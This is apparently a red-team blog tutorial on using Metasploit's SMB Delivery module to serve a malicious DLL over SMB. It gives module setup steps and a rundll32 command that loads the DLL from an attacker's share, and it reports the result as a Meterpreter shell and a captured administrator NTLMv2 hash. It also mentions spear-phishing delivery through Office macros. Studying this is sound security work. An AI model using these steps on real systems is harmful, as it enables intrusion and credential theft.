DLL Injection Over SMB Service
Privilege Escalation & Defense Evasion — MITRE ATT&CK (T1055)
Dynamic Link libraries, knowns as DLLs, are blocks of code containing data that provide instructions on how to run programs within the Windows system. If the DLLs are malicious, they can execute arbitrary code in memory and perform various nefarious operations.
An attacker can write a malicious DLL that gets injected into memory to elevate their privileges or evade detection. They can use this technique to gain initial network access or establish persistence.
In a red team assessment, attackers can embed DLLs in Macros within Microsoft Office documents and deliver them to the target through a spear-phishing campaign. Once a target opens the document and clicks on enable the Macro, the DLL payload triggers, and the attacker gains a reverse shell that allows them to execute commands on the compromised machine.
In this post, we will learn about the Metasploit module SMB Delivery that generates malicious DLL payloads and servers them via an SMB server.
- Metasploit Module — SMB Delivery
- Windows machine as a target
- Open SMB port — (TCP 445)
- The goal is to gain initial access to a network or establish persistence.
In the Kali machine, open up Metasploit with
sudo msfconsole, search for the SMB Delivery module, and type
use 0 to select it.
Options to show details about the selected module. The required options to run the exploit are the target IP address (SRVHOST) and port number 445 (SRVPORT). The payload can be
reverse_tcp; in this demo, I used
💡One thing to note is that I had trouble setting the IP address of the SRVHOST with this module. Every time I ran the exploit with a specified IP address, I would get BindFail errors — “[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable.”
After researching and digging into older comments in GitHub for Metasploit bind errors, I learned that this module is buggy on the Metasploit framework version v6.2.4-dev. The only solution that worked for me was running the exploit without setting the
SRVHOST IP address
(0.0.0.0)and later replacing it with the listener IP address.
For the payload information, ensure you have the correct listener address, your attacking machine IP address, and any port number that is not in use. Once everything is ready, type
exploit to run the module.
When the payload is generated
rundll32.exe \\0.0.0.0\tASoq\test.dll,0 , replace
0.0.0.0 with the attacker IP address
— rundll32.exe \\192.168.233.147\tASoq\test.dll,0 .
The generated payload uses the
Rundll32.exe application, which allows launching the functionalities stored in the shared .dll file and storing them in memory.
The following step is to execute the payload on the target machine; you can run in file explorer or PowerShell/CMD prompt.
💡 This post only shows how to generate DLL files with the SMB Delivery module ; in future posts, we will discuss how to deliver these payloads in a real-world scenarios.
When the payload is executed successfully, a Meterpreter shell opens and shows the captured
NTLMv2hash of the compromised user. In this case, it was the administrator hash.
That’s all for this post; thanks for stopping by!!
Dynamic link library (DLL) - Windows Client
This article describes what a dynamic link library (DLL) is and the various issues that may occur when you use DLLs. It…
Process Injection: Dynamic-link Library Injection
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as…
Abuse Elevation Control Mechanism: Bypass User Account Control
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC)…
Hack Remote Windows PC using DLL Files (SMB Delivery Exploit) - Hacking Articles
This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads…